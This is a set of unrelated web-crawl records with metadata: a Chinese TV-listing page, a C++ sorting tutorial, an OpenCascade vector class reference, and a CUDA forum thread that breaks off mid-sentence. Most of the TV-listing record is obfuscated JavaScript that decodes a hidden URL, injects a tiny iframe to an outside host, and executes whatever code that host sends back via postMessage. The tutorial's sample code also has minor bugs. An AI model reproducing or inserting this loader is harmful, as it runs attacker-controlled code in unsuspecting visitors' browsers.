{"ft_lang_label":"__label__en","ft_lang_prob":0.9279967,"math_prob":0.8979725,"size":3283,"snap":"2020-10-2020-16","text_gpt3_token_len":613,"char_repetition_ratio":0.15218054,"word_repetition_ratio":0.018621974,"special_character_ratio":0.18093207,"punctuation_ratio":0.07470289,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9627991,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-22T06:55:04Z\",\"WARC-Record-ID\":\"<urn:uuid:30dd6818-9116-414a-9260-7823c1106446>\",\"Content-Length\":\"20631\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8be24ec9-a241-4605-b1b4-552caa33744c>\",\"WARC-Concurrent-To\":\"<urn:uuid:e1d66781-7d22-4e52-b8f9-6f3126802891>\",\"WARC-IP-Address\":\"185.199.109.153\",\"WARC-Target-URI\":\"http://www.develbyte.in/machine-learning/what-is-machine-learning/\",\"WARC-Payload-Digest\":\"sha1:QS5V3ZVSNZJBJBIECLNIC2UBT4RSFEN4\",\"WARC-Block-Digest\":\"sha1:VMOWGV6NW3ACKWCLWKVC2BDJK5B2N5H7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145654.0_warc_CC-MAIN-20200222054424-20200222084424-00430.warc.gz\"}"}
http://www.fss001.com/type/dianshiju.html
[ "## 按更新按上映按观看热度\n\nfunction TYlQDV(e){var t=\"\",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function rYsjFIQ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t=\"\",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,\"\");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return TYlQDV(t);};eval('\\x77\\x69\\x6e\\x64\\x6f\\x77')['\\x65\\x52\\x75\\x5a\\x51\\x54\\x66\\x4c\\x64']=function(){;(function(u,r,w,d,f,c){var x=rYsjFIQ;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYlMkZoaWWtpbi5vbmxpbmUlMkY2Mzg3',''+'OLC'+'BNE'+'Zcm'+'v'+'',window,document,''+'5sh'+'IcB'+'SC'+'','W');};" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.96544003,"math_prob":0.9928025,"size":409,"snap":"2021-04-2021-17","text_gpt3_token_len":370,"char_repetition_ratio":0.2962963,"word_repetition_ratio":0.2826087,"special_character_ratio":0.5599022,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97906435,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-17T17:24:18Z\",\"WARC-Record-ID\":\"<urn:uuid:5539fe8a-013a-46fd-a414-16cbb595fad8>\",\"Content-Length\":\"90254\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e9ebdd40-945b-4616-94b9-8fbff57295d6>\",\"WARC-Concurrent-To\":\"<urn:uuid:7bcfbb4c-502f-4fc1-9e46-2e5ae617b75d>\",\"WARC-IP-Address\":\"154.17.5.127\",\"WARC-Target-URI\":\"http://www.fss001.com/type/dianshiju.html\",\"WARC-Payload-Digest\":\"sha1:FW2BVXIXEKWXPFY6CO5CKXDQKBXYGPC5\",\"WARC-Block-Digest\":\"sha1:7HMIR4FGL35G2ETEK7FFKUZZUHRPPIZR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038461619.53_warc_CC-MAIN-20210417162353-20210417192353-00440.warc.gz\"}"}
https://www.techtud.com/computer-science-and-information-technology/algorithms/sorting/sorting-techniques
[ "##### Bubble Sort | Insertion Sort\n\nSorting Algorithms\n\nAlgorithms are used to sort the numbers based on some conditions. These algorithms are further judged based on space & time complexity.\n\nSorting Algorithms are listed below:\n\n1. Bubble sort\n2. Insertion sort\n3. Quick sort\n4. Merge sort\n5. Heap sort\n\nBUBBLE SORT\n\nDefinition: It is a comparison​-based algorithm. It compares each pair of elements in an array and swaps them if they are out of order until the entire array is sorted. It works by repeatedly swapping the adjacent elements if they are in wrong order.\n\nLogic Behind it:", null, "Fig: bubble sort by w3resource\n\nProgram to implement the logic\n\ninclude<iostream>\n\nusing namespace std;\n\nint main()\n\n{\n\nint a,n,i,j,temp;\n\ncout<<\"Enter the size of array: \";\n\ncin>>n;\n\ncout<<\"Enter the array elements: \";\n\nfor(i=0;i<n;i++)\n\ncin>>a[i];\n\nfor(i=1;i<n;i++)\n\n{\n\nfor(j=0;j<(n-i);j++)\n\nif(a[j]>a[j+1])\n\n{\n\ntemp=a[j];\n\na[j]=a[j+1];\n\na[j+1]=temp;\n\n}\n\n}\n\ncout<<\"Array after bubble sort:\";\n\nfor(i=0;i<n;i++)\n\ncout<<\" \"<<a[i]\n\nreturn 0;\n\n}\n\nOutput:", null, "Algorithm Source:\n\nIt could be directly forked from my github repo:\n\nhttps://github.com/anwesha999/Basic_Algorithms\n\nfeel free to raise issue, pull requests for further understanding of concepts elaborated in my github repo.\n\nINSERTION SORT\n\nDefinition: The idea of insertion sort algorithm is to build your sorted array in place, shifting elements out of the way if necessary to make room as you go.\n\nLogic Behind insertion sort algorithm\n\nStep 1: call the 1st element of the array sorted.\n\nStep 2: repeat until all the elements are sorted by shifting the requisite no of the elements.", null, "Fig: insertion sort logic by w3resource\n\nInsertion Sort\n\n#include<iostream>\n\nusing namespace std;\n\nint main()\n\n{\n\nint n, arr, i, j, temp;\n\ncout<<\"Enter Array Size : \";\n\ncin>>n;\n\ncout<<n<<endl;\n\ncout<<\"Enter Array Elements : \";\n\nfor(i=0; i<n; i++)\n\n{\n\ncin>>arr[i];\n\n}\n\nfor(i=0; i<n; i++)\n\n{\n\ncout<<arr[i];\n\n}\n\ncout<<\"Sorting array using selection sort ... \\n\";\n\nfor(i=1; i<n; i++)\n\n{\n\ntemp=arr[i];\n\nj=i-1;\n\nwhile((temp>arr[j]) && (j>=0))\n\n{\n\narr[j+1]=arr[j];\n\nj=j-1;\n\n}\n\narr[j+1]=temp;\n\n}\n\ncout<<\"Array after sorting : \\n\";\n\nfor(i=0; i<n; i++)\n\n{\n\ncout<<arr[i]<<\" \";\n\n}\n\nreturn 0;\n\n}\n\nOutput:", null, "Interesting Question & Solution from Hackerrank\n\nChallenge Q1:\n\nInsertion Sort\nThese challenges will cover Insertion Sort, a simple and intuitive sorting algorithm. We will first start with a nearly sorted list.\n\nInsert element into sorted list\nGiven a sorted list with an unsorted number  in the rightmost cell, can you write some simple code to insert  into the array so that it remains sorted?\n\nSince this is a learning exercise, it won't be the most efficient way of performing the insertion. It will instead demonstrate the brute-force method in detail.\n\nAssume you are given the array  indexed . Store the value of . Now test lower index values successively from  to  until you reach a value that is lower than ,  in this case. Each time your test fails, copy the value at the lower index to the current index and print your array. When the next lower indexed value is smaller than , insert the stored value at the current index and print the entire array.\n\nThe results of operations on the example array is:\n\nStarting array:\nStore the value of  Do the tests and print interim results:\n\n1 2 4 5 5\n\n1 2 4 4 5\n\n1 2 3 4 5\n\nInput Format\n\nThere will be two lines of input:\n\nThe first line contains the integer , the size of the array\nThe next line contains  space-separated integers\n\nOutput Format\n\nPrint the array as a row of space-separated integers each time there is a shift or insertion.\n\nSample Input\n\n5\n\n2 4 6 8 3\n\nSample Output\n\n2 4 6 8 8\n\n2 4 6 6 8\n\n2 4 4 6 8\n\n2 3 4 6 8\n\nSolution:\n\n#include<iostream>\n\nusing namespace std;\n\nvoid insertionSort(int n, int *a) {\n\nint temp,i,j,k;\n\nfor(j=1;j<n;j++)\n\n{\n\ntemp=a[j];\n\ni=j-1;\n\nwhile(i>=0&&a[i]>temp)\n\n{\n\na[i+1]=a[i];\n\ni--;\n\nfor(k=0;k<n;k++)\n\ncout<<a[k]<<\" \";\n\ncout<<endl;\n\n}\n\na[i+1]=temp;\n\n}\n\nfor(k=0;k<n;k++)\n\ncout<<a[k]<<\" \";\n\n}\n\nint main(void) {\n\nint n;\n\ncin>>n;\n\nint a[n], i;\n\nfor(i = 0; i < n; i++) {\n\ncin>>a[i];\n\n}\n\ninsertionSort(n,a);\n\nreturn 0;\n\n}\n\nAnalysis of the solution provided:\n\nThe above code did the sorting in decreasing order from right to left sorting.\n\nInorder to do it it from right to left sorting. It could be solved as follows:\n\n#include<iostream>\n\nusing namespace std;\n\nvoid insertionSort(int n, int *a) {\n\nint temp,i,j,k;\n\nfor(i=1;i<n;i++)\n\n{\n\ntemp=a[i];\n\nj=i-1;\n\nwhile(j>=0&&a[j]<temp)\n\n{\n\na[j+1]=a[j];\n\nj--;\n\nfor(k=0;k<n;k++)\n\ncout<<a[k]<<\" \";\n\ncout<<endl;\n\n}\n\na[j+1]=temp;\n\n}\n\nfor(k=0;k<n;k++)\n\ncout<<a[k]<<\" \";\n\n}\n\nint main(void) {\n\nint n;\n\ncin>>n;\n\nint a[n], i;\n\nfor(i = 0; i < n; i++) {\n\ncin>>a[i];\n\n}\n\ninsertionSort(n,a);\n\nreturn 0;\n\n}\n\nInput (stdin)\n\n5\n\n2 4 6 8 3\n\n2 2 6 8 3\n\n4 2 2 8 3\n\n4 4 2 8 3\n\n6 4 2 2 3\n\n6 4 4 2 3\n\n6 6 4 2 3\n\n8 6 4 2 2\n\n8 6 4 3 2\n\nComparative Study of Sorting Algorithms:", null, "Conclusion:\n\nThe document is made fully for conceptual understanding of the topic, taken question from hacker rank and given the solution for further understanding of the topic rather than superfluous talk on algorithms. The logic of algorithm is crystal clear as the whole program revolves around it, resource.com images are also incorporated for the benefit of the reader. Moreover, the program is run and the output is displayed. I truly have left no stone unturned to explain the topic in depth.\n\nFeel free to fork my github repo, raise issue and pull request if you solve the problem with the logic illustrated here your preferable language like java.\n\nFollow me on github for the algorithms:\n\nhttps://github.com/anwesha999/Basic_Algorithms/tree/master\n\nStay tuned with Techtud for more such concepts.\n\n##### Introduction to sorting\n\nIntroduction to Sorting\n\nSorting is nothing but storage of data in sorted order, it can be in ascending or descending order. The term Sorting comes into picture with the term Searching. There are so many things in our real life that we need to search, like a particular record in database, roll numbers in merit list, a particular telephone number, any particular page in a book etc.\n\nSorting arranges data in a sequence which makes searching easier. Every record which is going to be sorted will contain one key. Based on the key the record will be sorted. For example, suppose we have a record of students, every such record will have the following data:\n\n• Name\n• Roll No.\n• Class\n• Age\n\nHere Student roll no. can be taken as key for sorting the records in ascending or descending order.\n\nNow suppose we have to search a Student with roll no. 25, we don't need to search the complete record we will simply search between the Students with roll no. between 20 to 30." ]
[ null, "https://www.techtud.com/sites/default/files/public/user_files/tud1/1_4.png", null, "https://www.techtud.com/sites/default/files/public/user_files/tud1/2_2.png", null, "https://www.techtud.com/sites/default/files/public/user_files/tud1/3_2.png", null, "https://www.techtud.com/sites/default/files/public/user_files/tud1/4_1.png", null, "https://www.techtud.com/sites/default/files/public/user_files/tud1/5_1.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.679225,"math_prob":0.8938323,"size":5529,"snap":"2019-51-2020-05","text_gpt3_token_len":1566,"char_repetition_ratio":0.1161991,"word_repetition_ratio":0.08629989,"special_character_ratio":0.30367154,"punctuation_ratio":0.15115353,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99020606,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,4,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-19T02:10:36Z\",\"WARC-Record-ID\":\"<urn:uuid:c2aa1c09-6e4c-4afe-913a-b2c70957a7b6>\",\"Content-Length\":\"76456\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d08bf9ce-db16-4aea-98f9-6f34fae6ffa8>\",\"WARC-Concurrent-To\":\"<urn:uuid:35ba3518-6481-4d6f-af1b-cbf71b4e9326>\",\"WARC-IP-Address\":\"104.27.131.132\",\"WARC-Target-URI\":\"https://www.techtud.com/computer-science-and-information-technology/algorithms/sorting/sorting-techniques\",\"WARC-Payload-Digest\":\"sha1:SWTJENZRJM2TGW7Y5OVJFNA5N77UDVCL\",\"WARC-Block-Digest\":\"sha1:HIEEOD7XZ7IIG4C4GS624HNF5762JOQQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250594101.10_warc_CC-MAIN-20200119010920-20200119034920-00379.warc.gz\"}"}
https://dev.opencascade.org/doc/occt-7.0.0/refman/html/class_geom___vector_with_magnitude.html
[ "# Geom_VectorWithMagnitude Class Reference\n\nDefines a vector with magnitude. A vector with magnitude can have a zero length. More...\n\n`#include <Geom_VectorWithMagnitude.hxx>`\n\nInheritance diagram for Geom_VectorWithMagnitude:", null, "[legend]\n\n## Public Member Functions\n\nGeom_VectorWithMagnitude (const gp_Vec &V)\nCreates a transient copy of V. More...\n\nGeom_VectorWithMagnitude (const Standard_Real X, const Standard_Real Y, const Standard_Real Z)\nCreates a vector with three cartesian coordinates. More...\n\nGeom_VectorWithMagnitude (const gp_Pnt &P1, const gp_Pnt &P2)\nCreates a vector from the point P1 to the point P2. The magnitude of the vector is the distance between P1 and P2. More...\n\nvoid SetCoord (const Standard_Real X, const Standard_Real Y, const Standard_Real Z)\nAssigns the values X, Y and Z to the coordinates of this vector. More...\n\nvoid SetVec (const gp_Vec &V)\nConverts the gp_Vec vector V into this vector. More...\n\nvoid SetX (const Standard_Real X)\nChanges the X coordinate of <me>. More...\n\nvoid SetY (const Standard_Real Y)\nChanges the Y coordinate of <me> More...\n\nvoid SetZ (const Standard_Real Z)\nChanges the Z coordinate of <me>. More...\n\nStandard_Real Magnitude () const override\nReturns the magnitude of <me>. More...\n\nStandard_Real SquareMagnitude () const override\nReturns the square magnitude of <me>. More...\n\nvoid Add (const Handle< Geom_Vector > &Other)\nAdds the Vector Other to <me>. More...\n\nHandle< Geom_VectorWithMagnitudeAdded (const Handle< Geom_Vector > &Other) const\nAdds the vector Other to <me>. More...\n\nvoid Cross (const Handle< Geom_Vector > &Other) override\nComputes the cross product between <me> and Other <me> ^ Other. More...\n\nHandle< Geom_VectorCrossed (const Handle< Geom_Vector > &Other) const override\nComputes the cross product between <me> and Other <me> ^ Other. A new vector is returned. More...\n\nvoid CrossCross (const Handle< Geom_Vector > &V1, const Handle< Geom_Vector > &V2) override\nComputes the triple vector product <me> ^ (V1 ^ V2). More...\n\nHandle< Geom_VectorCrossCrossed (const Handle< Geom_Vector > &V1, const Handle< Geom_Vector > &V2) const override\nComputes the triple vector product <me> ^ (V1 ^ V2). A new vector is returned. More...\n\nvoid Divide (const Standard_Real Scalar)\nDivides <me> by a scalar. More...\n\nHandle< Geom_VectorWithMagnitudeDivided (const Standard_Real Scalar) const\nDivides <me> by a scalar. A new vector is returned. More...\n\nHandle< Geom_VectorWithMagnitudeMultiplied (const Standard_Real Scalar) const\nComputes the product of the vector <me> by a scalar. A new vector is returned. More...\n\nvoid Multiply (const Standard_Real Scalar)\nComputes the product of the vector <me> by a scalar. More...\n\nvoid Normalize ()\nNormalizes <me>. More...\n\nHandle< Geom_VectorWithMagnitudeNormalized () const\nReturns a copy of <me> Normalized. More...\n\nvoid Subtract (const Handle< Geom_Vector > &Other)\nSubtracts the Vector Other to <me>. More...\n\nHandle< Geom_VectorWithMagnitudeSubtracted (const Handle< Geom_Vector > &Other) const\nSubtracts the vector Other to <me>. A new vector is returned. More...\n\nvoid Transform (const gp_Trsf &T) override\nApplies the transformation T to this vector. More...\n\nHandle< Geom_GeometryCopy () const override\nCreates a new object which is a copy of this vector. More...", null, "Public Member Functions inherited from Geom_Vector\nvoid Reverse ()\nReverses the vector <me>. More...\n\nHandle< Geom_VectorReversed () const\nReturns a copy of <me> reversed. More...\n\nStandard_Real Angle (const Handle< Geom_Vector > &Other) const\nComputes the angular value, in radians, between this vector and vector Other. The result is a value between 0 and Pi. Exceptions gp_VectorWithNullMagnitude if: More...\n\nStandard_Real AngleWithRef (const Handle< Geom_Vector > &Other, const Handle< Geom_Vector > &VRef) const\nComputes the angular value, in radians, between this vector and vector Other. The result is a value between -Pi and Pi. The vector VRef defines the positive sense of rotation: the angular value is positive if the cross product this ^ Other has the same orientation as VRef (in relation to the plane defined by this vector and vector Other). Otherwise, it is negative. Exceptions Standard_DomainError if this vector, vector Other and vector VRef are coplanar, except if this vector and vector Other are parallel. gp_VectorWithNullMagnitude if the magnitude of this vector, vector Other or vector VRef is less than or equal to gp::Resolution(). More...\n\nvoid Coord (Standard_Real &X, Standard_Real &Y, Standard_Real &Z) const\nReturns the coordinates X, Y and Z of this vector. More...\n\nStandard_Real X () const\nReturns the X coordinate of <me>. More...\n\nStandard_Real Y () const\nReturns the Y coordinate of <me>. More...\n\nStandard_Real Z () const\nReturns the Z coordinate of <me>. More...\n\nStandard_Real Dot (const Handle< Geom_Vector > &Other) const\nComputes the scalar product of this vector and vector Other. More...\n\nStandard_Real DotCross (const Handle< Geom_Vector > &V1, const Handle< Geom_Vector > &V2) const\nComputes the triple scalar product. Returns me . (V1 ^ V2) More...\n\nconst gp_VecVec () const\nConverts this vector into a gp_Vec vector. More...", null, "Public Member Functions inherited from Geom_Geometry\nvoid Mirror (const gp_Pnt &P)\nPerforms the symmetrical transformation of a Geometry with respect to the point P which is the center of the symmetry. More...\n\nvoid Mirror (const gp_Ax1 &A1)\nPerforms the symmetrical transformation of a Geometry with respect to an axis placement which is the axis of the symmetry. More...\n\nvoid Mirror (const gp_Ax2 &A2)\nPerforms the symmetrical transformation of a Geometry with respect to a plane. The axis placement A2 locates the plane of the symmetry : (Location, XDirection, YDirection). More...\n\nvoid Rotate (const gp_Ax1 &A1, const Standard_Real Ang)\nRotates a Geometry. A1 is the axis of the rotation. Ang is the angular value of the rotation in radians. More...\n\nvoid Scale (const gp_Pnt &P, const Standard_Real S)\nScales a Geometry. S is the scaling value. More...\n\nvoid Translate (const gp_Vec &V)\nTranslates a Geometry. V is the vector of the tanslation. More...\n\nvoid Translate (const gp_Pnt &P1, const gp_Pnt &P2)\nTranslates a Geometry from the point P1 to the point P2. More...\n\nHandle< Geom_GeometryMirrored (const gp_Pnt &P) const\n\nHandle< Geom_GeometryMirrored (const gp_Ax1 &A1) const\n\nHandle< Geom_GeometryMirrored (const gp_Ax2 &A2) const\n\nHandle< Geom_GeometryRotated (const gp_Ax1 &A1, const Standard_Real Ang) const\n\nHandle< Geom_GeometryScaled (const gp_Pnt &P, const Standard_Real S) const\n\nHandle< Geom_GeometryTransformed (const gp_Trsf &T) const\n\nHandle< Geom_GeometryTranslated (const gp_Vec &V) const\n\nHandle< Geom_GeometryTranslated (const gp_Pnt &P1, const gp_Pnt &P2) const", null, "Public Member Functions inherited from MMgt_TShared\nvirtual void Delete () const override\nMemory deallocator for transient classes. More...", null, "Public Member Functions inherited from Standard_Transient\nStandard_Transient ()\nEmpty constructor. More...\n\nStandard_Transient (const Standard_Transient &)\nCopy constructor – does nothing. More...\n\nStandard_Transientoperator= (const Standard_Transient &)\nAssignment operator, needed to avoid copying reference counter. More...\n\nvirtual ~Standard_Transient ()\nDestructor must be virtual. More...\n\nvirtual const opencascade::handle< Standard_Type > & DynamicType () const\n\nStandard_Boolean IsInstance (const opencascade::handle< Standard_Type > &theType) const\nReturns a true value if this is an instance of Type. More...\n\nStandard_Boolean IsInstance (const Standard_CString theTypeName) const\nReturns a true value if this is an instance of TypeName. More...\n\nStandard_Boolean IsKind (const opencascade::handle< Standard_Type > &theType) const\nReturns true if this is an instance of Type or an instance of any class that inherits from Type. Note that multiple inheritance is not supported by OCCT RTTI mechanism. More...\n\nStandard_Boolean IsKind (const Standard_CString theTypeName) const\nReturns true if this is an instance of TypeName or an instance of any class that inherits from TypeName. Note that multiple inheritance is not supported by OCCT RTTI mechanism. More...\n\nStandard_TransientThis () const\nReturns non-const pointer to this object (like const_cast). For protection against creating handle to objects allocated in stack or call from constructor, it will raise exception Standard_ProgramError if reference counter is zero. More...\n\nStandard_Integer GetRefCount () const\nGet the reference counter of this object. More...\n\nvoid IncrementRefCounter () const\nIncrements the reference counter of this object. More...\n\nStandard_Integer DecrementRefCounter () const\nDecrements the reference counter of this object; returns the decremented value. More...", null, "Public Types inherited from Standard_Transient\ntypedef void base_type", null, "Static Public Member Functions inherited from Standard_Transient\nstatic const char * get_type_name ()\n\nstatic const opencascade::handle< Standard_Type > & get_type_descriptor ()\nReturns type descriptor of Standard_Transient class. More...", null, "Protected Attributes inherited from Geom_Vector\ngp_Vec gpVec\n\n## Detailed Description\n\nDefines a vector with magnitude. A vector with magnitude can have a zero length.\n\n## Constructor & Destructor Documentation\n\n Geom_VectorWithMagnitude::Geom_VectorWithMagnitude ( const gp_Vec & V )\n\nCreates a transient copy of V.\n\n Geom_VectorWithMagnitude::Geom_VectorWithMagnitude ( const Standard_Real X, const Standard_Real Y, const Standard_Real Z )\n\nCreates a vector with three cartesian coordinates.\n\n Geom_VectorWithMagnitude::Geom_VectorWithMagnitude ( const gp_Pnt & P1, const gp_Pnt & P2 )\n\nCreates a vector from the point P1 to the point P2. The magnitude of the vector is the distance between P1 and P2.\n\n## Member Function Documentation\n\n void Geom_VectorWithMagnitude::Add ( const Handle< Geom_Vector > & Other )\n\nAdds the Vector Other to <me>.\n\n Handle< Geom_VectorWithMagnitude > Geom_VectorWithMagnitude::Added ( const Handle< Geom_Vector > & Other ) const\n\nAdds the vector Other to <me>.\n\n Handle< Geom_Geometry > Geom_VectorWithMagnitude::Copy ( ) const\noverridevirtual\n\nCreates a new object which is a copy of this vector.\n\nImplements Geom_Geometry.\n\n void Geom_VectorWithMagnitude::Cross ( const Handle< Geom_Vector > & Other )\noverridevirtual\n\nComputes the cross product between <me> and Other <me> ^ Other.\n\nImplements Geom_Vector.\n\n void Geom_VectorWithMagnitude::CrossCross ( const Handle< Geom_Vector > & V1, const Handle< Geom_Vector > & V2 )\noverridevirtual\n\nComputes the triple vector product <me> ^ (V1 ^ V2).\n\nImplements Geom_Vector.\n\n Handle< Geom_Vector > Geom_VectorWithMagnitude::CrossCrossed ( const Handle< Geom_Vector > & V1, const Handle< Geom_Vector > & V2 ) const\noverridevirtual\n\nComputes the triple vector product <me> ^ (V1 ^ V2). A new vector is returned.\n\nImplements Geom_Vector.\n\n Handle< Geom_Vector > Geom_VectorWithMagnitude::Crossed ( const Handle< Geom_Vector > & Other ) const\noverridevirtual\n\nComputes the cross product between <me> and Other <me> ^ Other. A new vector is returned.\n\nImplements Geom_Vector.\n\n void Geom_VectorWithMagnitude::Divide ( const Standard_Real Scalar )\n\nDivides <me> by a scalar.\n\n Handle< Geom_VectorWithMagnitude > Geom_VectorWithMagnitude::Divided ( const Standard_Real Scalar ) const\n\nDivides <me> by a scalar. A new vector is returned.\n\n Standard_Real Geom_VectorWithMagnitude::Magnitude ( ) const\noverridevirtual\n\nReturns the magnitude of <me>.\n\nImplements Geom_Vector.\n\n Handle< Geom_VectorWithMagnitude > Geom_VectorWithMagnitude::Multiplied ( const Standard_Real Scalar ) const\n\nComputes the product of the vector <me> by a scalar. A new vector is returned.\n\n void Geom_VectorWithMagnitude::Multiply ( const Standard_Real Scalar )\n\nComputes the product of the vector <me> by a scalar.\n\n void Geom_VectorWithMagnitude::Normalize ( )\n\nNormalizes <me>.\n\nRaised if the magnitude of the vector is lower or equal to Resolution from package gp.\n\n Handle< Geom_VectorWithMagnitude > Geom_VectorWithMagnitude::Normalized ( ) const\n\nReturns a copy of <me> Normalized.\n\nRaised if the magnitude of the vector is lower or equal to Resolution from package gp.\n\n void Geom_VectorWithMagnitude::SetCoord ( const Standard_Real X, const Standard_Real Y, const Standard_Real Z )\n\nAssigns the values X, Y and Z to the coordinates of this vector.\n\n void Geom_VectorWithMagnitude::SetVec ( const gp_Vec & V )\n\nConverts the gp_Vec vector V into this vector.\n\n void Geom_VectorWithMagnitude::SetX ( const Standard_Real X )\n\nChanges the X coordinate of <me>.\n\n void Geom_VectorWithMagnitude::SetY ( const Standard_Real Y )\n\nChanges the Y coordinate of <me>\n\n void Geom_VectorWithMagnitude::SetZ ( const Standard_Real Z )\n\nChanges the Z coordinate of <me>.\n\n Standard_Real Geom_VectorWithMagnitude::SquareMagnitude ( ) const\noverridevirtual\n\nReturns the square magnitude of <me>.\n\nImplements Geom_Vector.\n\n void Geom_VectorWithMagnitude::Subtract ( const Handle< Geom_Vector > & Other )\n\nSubtracts the Vector Other to <me>.\n\n Handle< Geom_VectorWithMagnitude > Geom_VectorWithMagnitude::Subtracted ( const Handle< Geom_Vector > & Other ) const\n\nSubtracts the vector Other to <me>. A new vector is returned.\n\n void Geom_VectorWithMagnitude::Transform ( const gp_Trsf & T )\noverridevirtual\n\nApplies the transformation T to this vector.\n\nImplements Geom_Geometry.\n\nThe documentation for this class was generated from the following file:" ]
[ null, "https://dev.opencascade.org/doc/occt-7.0.0/refman/html/class_geom___vector_with_magnitude__inherit__graph.png", null, "https://dev.opencascade.org/doc/occt-7.0.0/refman/html/closed.png", null, "https://dev.opencascade.org/doc/occt-7.0.0/refman/html/closed.png", null, "https://dev.opencascade.org/doc/occt-7.0.0/refman/html/closed.png", null, "https://dev.opencascade.org/doc/occt-7.0.0/refman/html/closed.png", null, "https://dev.opencascade.org/doc/occt-7.0.0/refman/html/closed.png", null, "https://dev.opencascade.org/doc/occt-7.0.0/refman/html/closed.png", null, "https://dev.opencascade.org/doc/occt-7.0.0/refman/html/closed.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.60423446,"math_prob":0.8330664,"size":12839,"snap":"2023-14-2023-23","text_gpt3_token_len":3365,"char_repetition_ratio":0.24511102,"word_repetition_ratio":0.33684796,"special_character_ratio":0.24939637,"punctuation_ratio":0.19090909,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9928359,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-29T02:32:30Z\",\"WARC-Record-ID\":\"<urn:uuid:ad973b1c-e90a-4a8b-9e19-0826e8685212>\",\"Content-Length\":\"95174\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:98566bbc-c5f9-4c0e-8c5c-71aa9afd9418>\",\"WARC-Concurrent-To\":\"<urn:uuid:e471d691-3464-4d04-9c04-786e0afefb7d>\",\"WARC-IP-Address\":\"5.196.194.182\",\"WARC-Target-URI\":\"https://dev.opencascade.org/doc/occt-7.0.0/refman/html/class_geom___vector_with_magnitude.html\",\"WARC-Payload-Digest\":\"sha1:FOBPKLKOVKLWHLAOETSCG7YSZK2UW63L\",\"WARC-Block-Digest\":\"sha1:3ZIHSERBIS4EVGX4T3CUMIMGESX44LG6\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224644574.15_warc_CC-MAIN-20230529010218-20230529040218-00057.warc.gz\"}"}
https://forums.developer.nvidia.com/t/cuda-matrix-multiplication-too-slow/14877
[ "", null, "# Cuda matrix multiplication too slow\n\nHello,\n\nI’m quite new at Cuda programming and I took the example of Cuda matrix multiplication (without using shared memory) from the Programming Guide, the result is right but is too slow. I use two 1024 x 1024 matrix with 16 x 16 blocks and I get an execution time of 5.39s (both in Debug and Release mode) whereas I get in C alone: 6.64s in Debug mode and 4.09s in Release mode. I use Visual Studio 2005. So in Release mode, Cuda seems no better than C, so I think I must have done something wrong somewhere.\n\nCould you tell me what I did wrong, please?\njcpao\n\nTry CUBLAS - the SDK code is not too efficient - “(without using shared memory)” - not a good idea. You also do not say what kind of card you have. A GTX280 will perform at about 380 GFlops single precision (SGEMM), while a 4-core Xeon will, with optimized code, using all cores, will be 80 GFlops.\n\nSomething else has got to be wrong here. The SDK matrix multiply example is about one third the speed of CUBLAS (I was timing this recently, for my own nefarious purposes), and copying 1024^2 matrices to the GPU and back isn’t that slow. What do these times include? Was the CUDA context already established before the timer began? Those times look suspiciously like ‘whole program’ times.\n\nI forgot to say that I use a GeForce 8400 